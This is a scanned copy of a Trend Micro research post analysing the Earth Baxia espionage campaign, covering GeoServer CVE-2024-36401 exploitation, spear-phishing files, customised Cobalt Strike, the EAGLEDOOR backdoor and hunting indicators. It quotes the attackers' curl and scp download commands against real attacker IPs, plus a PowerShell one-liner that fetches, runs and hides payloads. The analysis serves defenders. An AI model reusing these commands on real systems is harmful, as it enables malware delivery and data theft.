www.trendmicro.com
Open in
urlscan Pro
2.16.97.53
Public Scan
URL:
https://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html
Submission: On November 11 via api from IN — Scanned from DE
Submission: On November 11 via api from IN — Scanned from DE
Form analysis 1 forms found in the DOM
<form class="main-menu-search" aria-label="Search Trend Micro">
<div class="main-menu-search__field-wrapper" id="cludo-search-form">
<table class="gsc-search-box">
<tbody>
<tr>
<td class="gsc-input">
<input type="text" class="gsc-input-field" name="search" title="search" placeholder="Search" autocomplete="off" aria-label="search">
</td>
</tr>
</tbody>
</table>
</div>
</form>Text Content
Business
search close
* Solutions
* By Challenge
* By Challenge
* By Challenge
Learn more
* Understand, Prioritize & Mitigate Risks
* Understand, Prioritize & Mitigate Risks
Improve your risk posture with attack surface management
Learn more
* Protect Cloud-Native Apps
* Protect Cloud-Native Apps
Security that enables business outcomes
Learn more
* Protect Your Hybrid World
* Protect Your Hybrid, Multi-Cloud World
Gain visibility and meet business needs with security
Learn more
* Securing Your Borderless Workforce
* Securing Your Borderless Workforce
Connect with confidence from anywhere, on any device
Learn more
* Eliminate Network Blind Spots
* Eliminate Network Blind Spots
Secure users and key operations throughout your environment
Learn more
* See More. Respond Faster.
* See More. Respond Faster.
Move faster than your adversaries with powerful purpose-built XDR,
attack surface risk management, and zero trust capabilities
Learn more
* Extend Your Team
* Extend Your Team. Respond to Threats Agilely
Maximize effectiveness with proactive risk reduction and managed
services
Learn more
* Operationalizing Zero Trust
* Operationalizing Zero Trust
Understand your attack surface, assess your risk in real time, and
adjust policies across network, workloads, and devices from a single
console
Learn more
* By Role
* By Role
* By Role
Learn more
* CISO
* CISO
Drive business value with measurable cybersecurity outcomes
Learn more
* SOC Manager
* SOC Manager
See more, act faster
Learn more
* Infrastructure Manager
* Infrastructure Manager
Evolve your security to mitigate threats quickly and effectively
Learn more
* Cloud Builder and Developer
* Cloud Builder and Developer
Ensure code runs only as intended
Learn more
* Cloud Security Ops
* Cloud Security Ops
Gain visibility and control with security designed for cloud
environments
Learn more
* By Industry
* By Industry
* By Industry
Learn more
* Healthcare
* Healthcare
Protect patient data, devices, and networks while meeting regulations
Learn more
* Manufacturing
* Manufacturing
Protecting your factory environments – from traditional devices to
state-of-the-art infrastructures
Learn more
* Oil & Gas
* Oil & Gas
ICS/OT Security for the oil and gas utility industry
Learn more
* Electric Utility
* Electric Utility
ICS/OT Security for the electric utility
Learn more
* Federal
* Federal
Learn more
* Automotive
* Automotive
Learn more
* 5G Networks
* 5G Networks
Learn more
* Small & Midsized Business Security
* Small & Midsized Business Security
Stop threats with easy-to-use solutions designed for your growing
business
Learn more
* Platform
* Vision One Platform
* Vision One Platform
* Trend Vision One
Our Unified Platform
Bridge threat protection and cyber risk management
Learn more
* AI Companion
* Trend Vision One Companion
Your generative AI cybersecurity assistant
Learn more
* Attack Surface Management
* Attack Surface Management
Stop breaches before they happen
Learn more
* XDR (Extended Detection & Response)
* XDR (Extended Detection & Response)
Stop adversaries faster with a broader perspective and better context to
hunt, detect, investigate, and respond to threats from a single platform
Learn more
* Cloud Security
* Cloud Security
* Trend Vision One™
Cloud Security Overview
The most trusted cloud security platform for developers, security
teams, and businesses
Learn more
* Attack Surface Risk Management for Cloud
* Attack Surface Risk Management for Cloud
Cloud asset discovery, vulnerability prioritization, Cloud Security
Posture Management, and Attack Surface Management all in one
Learn more
* XDR for Cloud
* XDR for Cloud
Extend visibility to the cloud and streamline SOC investigations
Learn more
* Workload Security
* Workload Security
Secure your data center, cloud, and containers without compromising
performance by leveraging a cloud security platform with CNAPP
capabilities
Learn more
* Container Security
* Container Security
Simplify security for your cloud-native applications with advanced
container image scanning, policy-based admission control, and container
runtime protection
Learn more
* File Security
* File Security
Protect application workflow and cloud storage against advanced threats
Learn more
* Endpoint Security
* Endpoint Security
* Endpoint Security Overview
Defend the endpoint through every stage of an attack
Learn more
* XDR for Endpoint
* XDR for Endpoint
Stop adversaries faster with a broader perspective and better context
to hunt, detect, investigate, and respond to threats from a single
platform
Learn more
* Workload Security
* Workload Security
Optimized prevention, detection, and response for endpoints, servers,
and cloud workloads
Learn more
* Industrial Endpoint Security
* Industrial Endpoint Security
Learn more
* Mobile Security
* Mobile Security
On-premises and cloud protection against malware, malicious
applications, and other mobile threats
Learn more
* Network Security
* Network Security
* Network Security Overview
Expand the power of XDR with network detection and response
Learn more
* XDR for Network
* XDR for Network
Stop adversaries faster with a broader perspective and better context
to hunt, detect, investigate, and respond to threats from a single
platform
Learn more
* Network Intrusion Prevention (IPS)
* Network Intrusion Prevention (IPS)
Protect against known, unknown, and undisclosed vulnerabilities in your
network
Learn more
* Breach Detection System (BDS)
* Breach Detection System (BDS)
Detect and respond to targeted attacks moving inbound, outbound, and
laterally
Learn more
* Secure Service Edge (SSE)
* Secure Service Edge (SSE)
Redefine trust and secure digital transformation with continuous risk
assessments
Learn more
* Industrial Network Security
* Industrial Network Security
Learn more
* 5G Network Security
* 5G Network Security
Learn more
* Email Security
* Email Security
* Email Security
Stop phishing, malware, ransomware, fraud, and targeted attacks from
infiltrating your enterprise
Learn more
* Email and Collaboration Security
* Trend Vision One™
Email and Collaboration Security
Stop phishing, ransomware, and targeted attacks on any email service
including Microsoft 365 and Google Workspace
Learn more
* OT Security
* OT Security
* OT Security
Learn about solutions for ICS / OT security.
Learn more
* XDR for OT
* XDR for OT
Stop adversaries faster with a broader perspective and better context
to hunt, detect, investigate, and respond to threats from a single
platform
Learn more
* Industrial Network Security
* Industrial Network Security
Industrial Network Security
* Industrial Endpoint Security
* Industrial Endpoint Security
Learn more
* Threat Insights
* Threat Insights
See threats coming from miles away
Learn more
* Identity Security
* Identity Security
End-to-end identity security from identity posture management to
detection and response
Learn more
* On-Premises Data Sovereignty
* On-Premises Data Sovereignty
Prevent, detect, respond and protect without compromising data
sovereignty
Learn more
* All Products, Services, and Trials
* All Products, Services, and Trials
Learn more
* Research
* Research
* Research
* Research
Learn more
* Research, News, and Perspectives
* Research, News, and Perspectives
Learn more
* Research and Analysis
* Research and Analysis
Learn more
* Security News
* Security News
Learn more
* Zero Day Initiatives (ZDI)
* Zero Day Initiatives (ZDI)
Learn more
* Services
* Our Services
* Our Services
* Our Services
Learn more
* Service Packages
* Service Packages
Augment security teams with 24/7/365 managed detection, response, and
support
Learn more
* Managed XDR
* Managed XDR
Augment threat detection with expertly managed detection and response
(MDR) for email, endpoints, servers, cloud workloads, and networks
Learn more
* Incident Response
* Incident Response
* Incident Response
Our trusted experts are on call whether you're experiencing a breach
or looking to proactively improve your IR plans
Learn more
* Insurance Carriers and Law Firms
* Insurance Carriers and Law Firms
Stop breaches with the best response and detection technology on the
market and reduce clients’ downtime and claim costs
Learn more
* Support Services
* Support Services
Learn more
* Partners
* Partner Program
* Partner Program
* Partner Program Overview
Grow your business and protect your customers with the best-in-class
complete, multilayered security
Learn more
* Partner Competencies
* Partner Competencies
Stand out to customers with competency endorsements that showcase your
expertise
Learn more
* Partner Successes
* Partner Successes
Learn more
* Managed Security Service Provider
* Managed Security Service Provider
Deliver modern security operations services with our industry-leading
XDR
Learn more
* Managed Service Provider
* Managed Service Provider
Partner with a leading expert in cybersecurity, leverage proven
solutions designed for MSPs
Learn more
* Alliance Partners
* Alliance Partners
* Alliance Partners
We work with the best to help you optimize performance and value
Learn more
* Technology Alliance Partners
* Technology Alliance Partners
Learn more
* Find Alliance Partners
* Find Alliance Partners
Learn more
* Partner Resources
* Partner Resources
* Partner Resources
Discover resources designed to accelerate your business’s growth and
enhance your capabilities as a Trend Micro partner
Learn more
* Partner Portal Login
* Partner Portal Login
Login
* Trend Campus
* Trend Campus
Accelerate your learning with Trend Campus, an easy-to-use education
platform that offers personalized technical guidance
Learn more
* Co-Selling
* Co-Selling
Access collaborative services designed to help you showcase the value
of Trend Vision One™ and grow your business
Learn more
* Become a Partner
* Become a Partner
Learn more
* Distributors
* Distributors
Learn more
* Find Partners
* Find Partners
Locate a partner from whom you can purchase Trend Micro solutions
Learn more
* Company
* Why Trend Micro
* Why Trend Micro
* Why Trend Micro
Learn more
* Customer Success Stories
* Customer Success Stories
Learn more
* The Human Connection
* The Human Connection
Learn more
* Industry Accolades
* Industry Accolades
Learn more
* Strategic Alliances
* Strategic Alliances
Learn more
* Compare Trend Micro
* Compare Trend Micro
* Compare Trend Micro
See how Trend outperforms the competition
Let's go
* vs. Crowdstrike
* Trend Micro vs. Crowdstrike
Crowdstrike provides effective cybersecurity through its cloud-native
platform, but its pricing may stretch budgets, especially for
organizations seeking cost-effective scalability through a true single
platform
Let's go
* vs. Microsoft
* Trend Micro vs. Microsoft
Microsoft offers a foundational layer of protection, yet it often
requires supplemental solutions to fully address customers' security
problems
Let's go
* vs. Palo Alto Networks
* Trend Micro vs. Palo Alto Networks
Palo Alto Networks delivers advanced cybersecurity solutions, but
navigating its comprehensive suite can be complex and unlocking all
capabilities requires significant investment
Let's go
* About Us
* About Us
* About Us
Learn more
* Trust Center
* Trust Center
Learn more
* History
* History
Learn more
* Diversity, Equity and Inclusion
* Diversity, Equity and Inclusion
Learn more
* Corporate Social Responsibility
* Corporate Social Responsibility
Learn more
* Leadership
* Leadership
Learn more
* Security Experts
* Security Experts
Learn more
* Internet Safety and Cybersecurity Education
* Internet Safety and Cybersecurity Education
Learn more
* Legal
* Legal
Learn more
* Investors
* Investors
Learn more
* Formula E Racing
* Formula E Racing
Learn more
* Connect With Us
* Connect With Us
* Connect With Us
Learn more
* Newsroom
* Newsroom
Learn more
* Events
* Events
Learn more
* Careers
* Careers
Learn more
* Webinars
* Webinars
Learn more
Back
Back
Back
Back
* Free Trials
* Contact Us
Looking for home solutions?
Under Attack?
3 Alerts
Back
Unread
All
* Silent Threat: Red Team Tool EDRSilencer Disrupting Endpoint Security
Solutions
close
Learn more
* Gartner 2024 CNAPP Market Guide Insights for Leaders
close
Get insights
* 5 AI Security Takeaways featuring Forrester
close
Learn key strategies
Folio (0)
Support
* Business Support Portal
* Education and Certification
* Contact Support
* Find a Support Partner
Resources
* AI Security
* Trend Micro vs. Competition
* Cyber Risk Assessments
* What Is?
* Threat Encyclopedia
* Cyber Insurance
* Glossary of Terms
* Webinars
Log In
* Vision One
* Support
* Partner Portal
* Cloud One
* Product Activation and Management
* Referral Affiliate
Back
arrow_back
search
close
Content has been added to your Folio
Go to Folio (0) close
APT & Targeted Attacks
EARTH BAXIA USES SPEAR-PHISHING AND GEOSERVER EXPLOIT TO TARGET APAC
We observed Earth Baxia carrying out targeted attacks against APAC countries
that involved advanced techniques like spear-phishing and customized malware,
with data suggesting that the group operates from China.
By: Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, Philip Chen September 19, 2024
Read time: 8 min (2215 words)
Save to Folio
Subscribe
--------------------------------------------------------------------------------
SUMMARY
* Threat actor Earth Baxia has targeted a government organization in Taiwan –
and potentially other countries in the Asia-Pacific (APAC) region – using
spear-phishing emails and the GeoServer vulnerability CVE-2024-36401.
* CVE-2024-36401 is a remote code execution exploit that allowed the threat
actors to download or copy malicious components.
* The threat actor employs GrimResource and AppDomainManager injection to
deploy additional payloads, aiming to lower the victim’s guard.
* Customized Cobalt Strike components were deployed on compromised machines
through the two initial access vectors. The altered version of Cobalt Strike
included modified internal signatures and a changed configuration structure
for evasion.
* Earth Baxia also used a new backdoor named EAGLEDOOR, which supports multiple
communication protocols for information gathering and payload delivery.
In July, we observed suspicious activity targeting a government organization in
Taiwan, with other APAC countries also likely targeted, attributed to the threat
actor Earth Baxia. In these campaigns, Earth Baxia used spear-phishing emails
and exploited CVE-2024-36401, a vulnerability in an open-source server for
sharing geospatial data called GeoServer, as initial access vectors, deploying
customized Cobalt Strike components on compromised machines. Additionally, we
identified a new backdoor called EAGLEDOOR that supports multiple protocols. In
this report, we will discuss their infection chain and provide a detailed
analysis of the malware involved.
ATTRIBUTION AND VICTIMOLOGY
Upon investigation, we discovered that multiple servers were hosted on the
Alibaba cloud service or located in Hong Kong, and some related samples were
submitted to VirusTotal from China. After checking one of the Cobalt Strike
watermarks (666666) used by the threat actors on Shodan, we also found that only
a few machines were linked to this watermark, most of which were in China (Table
1). Therefore, we suspect that the APT group behind these campaigns originates
from China.
Country Number of machines China 13 Japan 1 Singapore 1
Table 1. Machines linked to the Cobalt Strike watermark 666666
Based on the collected phishing emails, decoy documents, and observations from
incidents, it appears that the targets are primarily government agencies,
telecommunication businesses, and the energy industry in the Philippines, South
Korea, Vietnam, Taiwan, and Thailand (Figure 1). Notably, we also discovered a
decoy document written in simplified Chinese, suggesting that China is also one
of the impacted countries. However, due to limited information, we cannot
accurately determine which sectors in China are affected.
Figure 1. Map chart of impacted regions
INFECTION CHAIN
In this section, we will discuss the threat group’s attack flow as identified by
our telemetry, including the malware and tactics, techniques, and procedures
(TTPs) involved, as shown in Figure 2.
Figure 2. Overview of the attack chain
INITIAL ACCESS
VULNERABLE GEOSERVER
In some cases, Earth Baxia leveraged CVE-2024-36401, a remote code execution
(RCE) exploit on GeoServer, to execute arbitrary commands: Our investigation
revealed that they used commands like “curl” and “scp” to download or copy
malicious components into the victim’s environment, and then executed these
components using the RCE exploit (Table 2).
The file download via curl is as follows:
curl --connect-timeout 3 -m 10 -o c:\windows\temp\{file name}
http://167[.]172[.]89[.]142/{file name}
The remote file copy via scp is follows:
cmd /c "scp -P 23 -o StrictHostKeyChecking=no -o ConnectTimeout=3 -o
UserKnownHostsFile=C:\windows\temp\ t1sc@152[.]42[.]243[.]170:/tmp/bd/{file
name} c:\windows\temp\"
File name Description Edge.exe Legitimate executable used to load msedge.dll
msedge.dll Malicious loader (SWORDLDR) used to launch Cobalt Strike (Logs.txt)
Logs.txt Customized Cobalt Strike shellcode
Table 2. The malicious components downloaded by RCE exploit
SPEAR-PHISHING EMAIL VECTOR
In early August, Earth Baxia began leveraging phishing emails to advance their
attacks. One of the victims reported receiving over 70 phishing emails within
approximately two weeks. We also identified similar email attachments on
VirusTotal. Analysis of the decoy documents suggests that the attackers may have
targeted not just Taiwan, but also Vietnam and China.
Most of the email subjects are meticulously tailored with varying content; the
attached ZIP file contains a decoy MSC file, which we named RIPCOY. At this
stage, when the user double-clicks this file, the embedded obfuscated VBScript
attempts to download multiple files from a public cloud service, typically
Amazon Web Services (AWS) in a technique called GrimResource. These files
include a decoy PDF document, .NET applications, and a configuration file.
The .NET applications and configuration file dropped by the MSC file then use a
technique known as AppDomainManager injection, which allows the injection of a
custom application domain to execute arbitrary code within the process of the
target application. It enables the execution of any .NET application to load an
arbitrary managed DLL, either locally or remotely from a website, without
directly invoking any Windows API calls (Figure 3).
Figure 3. The configuration file contains download sites loaded by the .NET
framework application
The legitimate .NET applications then proceed to download the next-stage
downloader based on the URL specified in the .config file, which points to a
.NET DLL file (Figure 4). The URL for this download is obfuscated using Base64
and AES encryption. Most of the download sites identified at this stage were
hosted on public cloud services, typically Aliyun. Once the DLL retrieves the
shellcode, it executes it using the CreateThread API, with all processes running
entirely in memory.
Figure 4. The .NET DLL file contains a download site with obfuscated code
The shellcode gathers information from the affected machine, including the
username, computer name, parent process (the legitimate .NET application), and
memory status. It appends this information as a ‘client_id’ parameter to a URL
and sends it to a custom domain. It may receive a 64-character response from the
server, which is then used to request the next payload from the URL (Figure 5).
However, we couldn’t receive the final payload.
Figure 5. A screenshot of network traffic analysis from the VirusTotal sandbox
The shellcode exhibited several distinct features:
* The attacker disguised the domain names to resemble public cloud services by
using names like “s3cloud-azure” or “s2cloud-amazon”. Each network request
followed a specific pattern, including a unique user-agent string and data
formatted in JSON.
* The final stage of the download process always had the path
“/api/v1/homepage/”, suggesting that the file might still be hosted on a
third-party cloud service.
* By hosting files on the cloud, the attacker gains the advantage of easily
replacing or updating files, including .config files with different download
links, making it significantly more challenging for us to track their
activities.
Although we didn’t confirm what the final shellcode was, our telemetry did
reveal that the “oncesvc.exe” launched by the MSC file would run another
process, “Edge.exe”, to load the Cobalt Strike components msedge.dll and
Logs.txt. In the next section, we discuss these components further.
BACKDOOR ANALYSIS
COBALT STRIKE
Earth Baxia utilizes DLL side-loading to execute Cobalt Strike shellcode (Figure
6). To evade defenses, the shellcode loader, known as “SWORDLDR,” decrypts the
payload and injects it into a specified process according to its embedded
configuration (Figure 7).
Figure 6. Decrypted shellcode
Figure 7. Execution flow of Cobalt Strike components
The injected shellcode is a customized version of Cobalt Strike. Unlike the
usual Cobalt Strike payload, the modified version’s MZ header has been removed
and the internal signatures have been modified (Figure 8). Additionally, the
structure of configuration has also been slightly changed (Figure 9).
Figure 8. Header differences between the usual (left) and modified (right)
versions of Cobalt Strike
Figure 9. Differences in configuration structures between the usual (left) and
modified (right) versions of Cobalt Strike
EAGLEDOOR
On the victim side, we collected these sample sets:
* Systemsetting.dll (EAGLEDOOR loader)
* Systemsetting.exe
These samples are components of EAGLEDOOR, which was dropped and launched by the
Cobalt Strike process mentioned previously.
The threat actors apply DLL side-loading to start the loader and execute
EAGLEDOOR in memory. In the loader, there are two DLL files encrypted in the
.data section:
Hook.dll
This is the module for hooking the specific API with export function,
MyCreateHook, to hook the APIs which are frequently called (Figure 10). Once the
hooked API is called, the malicious module, Eagle.dll, will be executed.
Figure 10. Loader applies hook.dll to hook the APIs, GetProcAddress, FreeLibrary
and LdrUnloadDll
Eagle.dll
The code flow of launching Eagle.dll is shown below. The loader decrypts this
module and executes the first export function “RunEagle” in the memory (Figure
11).
Figure 11. The code flow to start Eagle.dll in the loader
EAGLEDOOR supports four methods to communicate with a C&C server:
* DNS
* HTTP
* TCP
* Telegram
Upon analysis, TCP, HTTP and DNS protocol are utilized to send the victim
machine’s status to a C&C server. The main backdoor functionality is achieved by
Telegram protocol through the Bot API, and the applied methods include:
* getFile
* getUpdates
* sendDocument
* sendMessage
These methods are effective for gathering information, delivering files, and
executing the next payload on the victim's system. However, in this case, we
only collected samples related to TCP and HTTP protocols on the victim side.
Therefore, we will keep monitoring the channel to track the threat actors' next
steps in their Telegram communications.
EXFILTRATION
Based on our investigation, we observed that Earth Baxia would archive the
collected data and exfiltrate stolen data by using curl.exe. Figure 12 shows a
case of data exfiltration to their file server (152[.]42[.]243[.]170) through
curl.
Figure 12. The process for exfiltration by curl.exe
FURTHER OBSERVATIONS
Most phishing emails lure users with an attachment. However, based on our
telemetry, some phishing emails are sent with a phishing link that downloads a
ZIP file. So far, we know there are four combinations at the initial access
stage, as shown in Figure 13. Both MSC file and LNK file are able to deliver
those two toolsets.
Figure 13. The combinations we know at initial access
While investigating the case, we came across the download site
static[.]krislab[.]site in an LNK file. It executes a PowerShell command to
download decoy documents and Cobalt Strike toolsets, which include Edge.exe,
msedge.dll, and Logs.txt (Table 3). This toolset is similar to the one we
mentioned earlier in this blog entry.
Each zip file contains a LNK file with the target PowerShell command:
wget -Uri https://static.krislab.site/infodata/msedge.dll -OutFile
C:\Users\Public\msedge.dll; wget -Uri http
s://static.krislab.site/infodata/Logs.txt -OutFile C:\Users\Public\Logs.txt;wget
-Uri https://static.krislab.site/infoda ta/Edge.exe -OutFile
C:\Users\Public\Edge.exe;C:\Users\Public\Edge.exe;wget -Uri
"https://static.krislab.site/infodata/yn.pdf" -OutFile
"C:\Users\Public\邀請函.pdf";C:\Windows\System32\cmd.exe /c start /b
"C:\Users\Public\邀請函.pdf";attrib +s +h C:\Users\Public\Edge.exe;attrib +s +h
C:\Users\Public\Logs.txt;attrib +s +h C:\Users\Public\msedge.dll
Discovered Date Path File description June 21, 2024 /infodata/Invitation1017.zip
Cobalt Strike tool set /infodata/Edge.exe /infodata/msedge.dll
/infodata/Logs.txt /infodata/tw.pdf Decoy document June 25, 2024
/infodata/break_1/06.pdf Decoy document June 30, 2024
/infodata/Invitation0630.zip Cobalt Strike tool set /infodata/Edge.exe
/infodata/msedge.dll /infodata/Logs.txt /infodata/yn.pdf Decoy document July 2,
2024 /infodata/Invitation0702.zip Cobalt Strike tool set /infodata/Edge.exe
/infodata/msedge.dll /infodata/Logs.txt /infodata/hzm.pdf Decoy document August
15, 2024 /infodata/Edge.exe Cobalt Strike tool set /infodata/msedge.dll
/infodata/Logs.txt /infodata/k1.pdf Decoy document
Table 3. Files hosted on static[.]krislab[.]site
TREND MICRO VISION ONE THREAT INTELLIGENCE
To stay ahead of evolving threats, Trend Micro customers can access a range of
Intelligence Reports and Threat Insights within Trend Micro Vision One. Threat
Insights helps customers stay ahead of cyber threats before they happen and
better prepared for emerging threats. It offers comprehensive information on
threat actors, their malicious activities, and the techniques they use. By
leveraging this intelligence, customers can take proactive steps to protect
their environments, mitigate risks, and respond effectively to threats.
Trend Micro Vision One Intelligence Reports App [IOC Sweeping]
* Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
* Earth Baxia: A dive into their aggressive campaign in August
Trend Micro Vision One Threat Insights App
* Threat Actor: Earth Baxia
* Emerging Threats: Earth Baxia Uses Spear-Phishing and GeoServer Exploit to
Target APAC
HUNTING QUERIES
Trend Micro Vision One Search App
Vision One customers can use the Search App to match or hunt the malicious
indicators mentioned in this blog post with data in their environment.
Network Communication with Earth Baxia - IP
eventId:3 AND (src:"167.172.89.142" OR src:"167.172.84.142" OR
src:"152.42.243.170" OR src:"188.166.252.85" OR dst:"167.172.89.142" OR
dst:"167.172.84.142" OR dst:"152.42.243.170" OR dst:"188.166.252.85")
More hunting queries are available for Vision One customers with Threat Insights
Entitlement enabled.
CONCLUSION
Earth Baxia, likely based in China, conducted a sophisticated campaign targeting
government and energy sectors in multiple APAC countries. They used advanced
techniques like GeoServer exploitation, spear-phishing, and customized malware
(Cobalt Strike and EAGLEDOOR) to infiltrate and exfiltrate data. The use of
public cloud services for hosting malicious files and the multi-protocol support
of EAGLEDOOR highlight the complexity and adaptability of their operations.
Continued vigilance and advanced threat detection measures are essential to
counter such threats. To mitigate the risk of this kind of threat, security
teams can also implement the following best practices:
* Implement continuous phishing awareness training for employees.
* Double-check the sender and subject of emails, particularly those from
unfamiliar sources or with vague subjects.
* Deploy multi-layered protection solutions to help detect and block threats
early in the malware infection chain.
Organizations can help protect themselves from these kinds of attacks with Trend
Vision One™, which enables security teams to continuously identify attack
surfaces, including known, unknown, managed, and unmanaged cyber assets. Vision
One helps organizations prioritize and address potential risks, including
vulnerabilities. It considers critical factors such as the likelihood and impact
of potential attacks and offers a range of prevention, detection, and response
capabilities. The multilayered protection and behavior detection Vision One
offers can help block malicious tools and services before they can inflict
damage on user machines and systems.
INDICATORS OF COMPROMISE (IOCS)
The full list of IOCs can be found here.
Tags
Phishing | APT & Targeted Attacks | Articles, News, Reports
AUTHORS
* Ted Lee
Threat Researcher
* Cyris Tseng
Threat Researcher
* Pierre Lee
Sr. Threat Researcher
* Sunny Lu
Threats Analyst
* Philip Chen
Threat Researcher
Contact Us
Subscribe
RELATED ARTICLES
* Trend Micro and Japanese Partners Reveal Hidden Connections Among SEO Malware
Operations
* Breaking Down Earth Estries' Persistent TTPs in Prolonged Cyber Operations
* Analyzing How TeamTNT Used Compromised Docker Hub Accounts
See all articles
Experience our unified platform for free
* Claim your 30-day trial
*
*
*
*
*
RESOURCES
* Blog
* Newsroom
* Threat Reports
* Find a Partner
*
*
SUPPORT
* Business Support Portal
* Contact Us
* Downloads
* Free Trials
*
*
ABOUT TREND
* About Us
* Careers
* Locations
* Upcoming Events
* Trust Center
*
Country Headquarters
Trend Micro - United States (US)
225 East John Carpenter Freeway
Suite 1500
Irving, Texas 75062
Phone: +1 (817) 569-8900
Select a country / region
United States expand_more
close
THE AMERICAS
* United States
* Brasil
* Canada
* México
MIDDLE EAST & AFRICA
* South Africa
* Middle East and North Africa
EUROPE
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Nederland
* Norge (Norway)
* Polska (Poland)
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
ASIA & PACIFIC
* Australia
* Центральная Азия (Central Asia)
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* Монголия (Mongolia) and рузия (Georgia)
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
Privacy | Legal | Accessibility | Site map
Copyright ©2024 Trend Micro Incorporated. All rights reserved
Copyright ©2024 Trend Micro Incorporated. All rights reserved
sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk
This website uses cookies for website functionality, traffic analytics,
personalization, social media functionality and advertising. Our Cookie Notice
provides more information and explains how to amend your cookie settings.Learn
more
Cookies Settings Accept
✓
Danke für das Teilen!
AddToAny
Mehr…
BDOW!
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1